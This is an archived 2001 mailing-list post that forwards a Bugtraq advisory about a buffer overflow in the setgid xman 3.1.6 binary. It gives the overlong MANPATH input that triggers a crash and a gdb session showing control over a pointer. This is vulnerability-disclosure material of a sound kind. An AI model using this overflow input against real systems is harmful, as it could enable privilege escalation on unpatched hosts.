From: KF (dotslashsnosoft.com)
Date: Thu Jul 12 2001 - 20:35:13 CDT

    I tried to send this to Bugtraq right about the same time I had
    connection issues... not sure if it was denied so I figured I would try
    to send it to vuln-dev just in case.
    -KF

    -------- Original Message --------
    Subject: suid xman 3.1.6 overflows
    Date: Wed, 11 Jul 2001 23:32:49 -0400
    From: KF <dotslashsnosoft.com>
    To: bugtraqsecurityfocus.com, srtxgchanae.alphanet.ch

    xman from at least X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic
    overflow.

    srtxgchanae.alphanet.ch is noted as the packager of this RPM. I do not
    know the author.

    [rootlinux lib]# ls -al `which xman`
    -rwxr-sr-x 1 root man 41076 Jun 17 1998 /usr/X11R6/bin/xman*

    [rootlinux lib]# xman
    [rootlinux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
    [rootlinux lib]# xman
    Xman Error: Could not allocate memory for manual sections.

    [rootlinux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
    [rootlinux lib]# xman
    Segmentation fault

    [rootlinux lib]# gdb xman
    GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
    (gdb) run
    Starting program: /usr/X11R6/bin/xman
    0x4022fb66 in getenv () from /lib/libc.so.6
    (gdb) bt
    #0 0x4022fb66 in getenv () from /lib/libc.so.6
    #1 0x0804bc47 in _start ()
    #2 0x41414141 in ?? ()
    Cannot access memory at address 0x41414141

    (gdb) info registers
    eax 0xbffee784 -1073813628
    ecx 0x804fb29 134544169
    edx 0x805414c 134562124
    ebx 0x40328f2c 1077055276
    esp 0xbffec6fc 0xbffec6fc
    ebp 0xbffec714 0xbffec714
    esi 0x6 6
    edi 0x41414141 1094795585
    eip 0x4022fb66 0x4022fb66

    -KF